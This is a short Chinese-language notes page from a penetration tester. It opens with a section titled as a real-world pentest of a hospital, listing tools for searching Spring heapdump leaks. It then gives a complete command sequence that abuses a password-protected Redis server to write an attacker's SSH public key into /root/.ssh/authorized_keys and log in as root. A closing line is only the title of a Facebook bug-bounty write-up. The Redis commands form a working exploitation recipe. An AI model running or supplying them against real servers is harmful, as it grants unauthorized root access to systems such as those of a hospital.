随手记
一、某医院的实战渗透测试(组合拳)
Spring信息泄露
下载下来的heapdump文件,可以使用工具进行内容检索,下面为几个常用的heapdump查看工具。
<https://github.com/wyzxxz/heapdump_tool(比较常用)>
<https://github.com/whwlsfb/JDumpSpider(用法简单)>
Redis写公钥
ssh-keygen -t rsa //执行生成key命令
(echo -e "\\n\\n"; cat id_rsa.pub; echo -e "\\n\\n") > key.txt //将公钥写入txt
cat /root/.ssh/key.txt | redis-cli -h 172.16.198.244 -a redis -x set xxx //将.ssh目录下的公钥文件1.txt 通过redis-cli客户端写入到目标主机缓冲中,-a是因为redis存在密码,而不是未授权。
连接redis进行
redis-cli -h 172.16.198.244 -p 6379 -a redis //使用客户端登录目标
config set dir /root/.ssh //设置存储公钥路径,redis的备份路径
config get dir //查看是否设置成功
config set dbfilename "authorized_keys" //设置文件名称
save //保存
5、 ssh -i id_rsa [email protected] //进行ssh连接即可
ps:也可以把id_rsa转换为PEM格式。然后把生成的id_rsa文件导入到finalshell,用户名是root,即可连接。
二、实战 | 我如何通过向 Facebook 提交漏洞赚取31500美元
周末待看
[ ]
[ ]